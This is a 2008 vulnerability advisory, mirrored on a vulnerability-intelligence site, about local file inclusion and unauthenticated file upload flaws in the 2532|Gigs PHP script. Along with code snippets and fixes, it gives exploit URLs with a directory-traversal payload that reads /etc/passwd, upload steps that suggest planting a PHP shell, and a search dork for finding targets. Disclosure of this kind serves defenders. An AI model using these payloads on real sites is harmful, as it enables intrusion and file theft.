Lucene search

K

2532|Gigs 1.2 Stable LFI / File Upload Vulnerabilities

🗓️ 22 Dec 2008 00:00:00Reported by OsirysType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

2532|Gigs 1.2 Stable LFI / File Upload Vulnerabilities. Multiple local file inclusions and remote file upload vulnerabilities in 2532|Gigs v1.2 Stable script

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`[START]  
  
#########################################################################################  
[0x01] Informations:  
  
Script : 2532|Gigs v1.2 Stable  
Download : http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1  
Dork : Powered by 2532|Gigs v1.2.2  
Vulnerability : Local File Inclusion / Remote File Upload  
Author : Osirys  
Contact : osirys[at]live[dot]it  
Website : http://osirys.org  
Notes : Proud to be Italian  
Greets: : XaDoS, x0r, emgent, Jay, str0ke, Todd and AlpHaNiX  
  
  
#########################################################################################  
[0x02] Bug: [Multiple Local File Inclusions]  
######  
  
Bugged file is: /[path]/settings.php  
Bugged file is: /[path]/deleteuser.php  
Bugged file is: /[path]/mini_calendar.php  
Bugged file is: /[path]/manage_venues.php  
Bugged file is: /[path]/manage_gigs.php  
  
* There are a lot of other files vulnerable to LFI !  
  
[CODE]  
  
<?php  
/*  
2532|Gigs v1.1  
www.2532gigs.com  
./settings.php  
*/  
  
// Load the settings.php language file  
include_once("languages/$language/settings.php");  
  
[/CODE]  
  
settings.php page starts in this way. Includes a non declarate variable -> $language  
  
[!] FIX: Declare $language var.  
  
  
[!] EXPLOIT: /[path]/settings.php?language=[local_file_to_include]  
[!] EXPLOIT: /[path]/deleteuser.php?language=[local_file_to_include]  
[!] EXPLOIT: /[path]/mini_calendar?language=[local_file_to_include]  
[!] EXPLOIT: /[path]/manage_venues.php?language=[local_file_to_include]  
[!] EXPLOIT: /[path]/manage_gigs.php?language=[local_file_to_include]  
../../../../../../../../../../etc/passwd%00  
  
  
#########################################################################################  
[0x03] Bug: [Remote File Upload]  
######  
  
Bugged file is: /[path]/upload_flyer.php  
  
[CODE]  
  
if (isset($_POST['submitflyer']))  
{  
if (strlen($_FILES['banner']['name']) > 0)  
{  
$target = "flyers/".$_FILES['banner']['name'];  
move_uploaded_file($_FILES['banner']['tmp_name'], $target);  
  
// Other code, like it cheeks if /[path]/flyers dir is writable or not !  
  
[/CODE]  
  
As we can see, everyone can upload everything that he wants. There is not login required,  
and there isn't a cheek for the extension of the file that is going to be uploaded.  
So, an unregistered user can upload a file of any extension, like a .php file. Why not  
a php shell ?  
  
[!] FIX: Before the upload script, just cheek if the user is registered, and then allow him  
only to upload .gif/jpg or the extension you want, not .php or other extensions !  
  
  
[!] EXPLOIT:  
1) Go to: /path/upload_flyer.php  
2) Select your local file to upload  
3) Press submit button  
4) Cheek your file at: /[path]/flyers/your_local_file.your_extension  
  
  
#########################################################################################  
  
[/END]  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo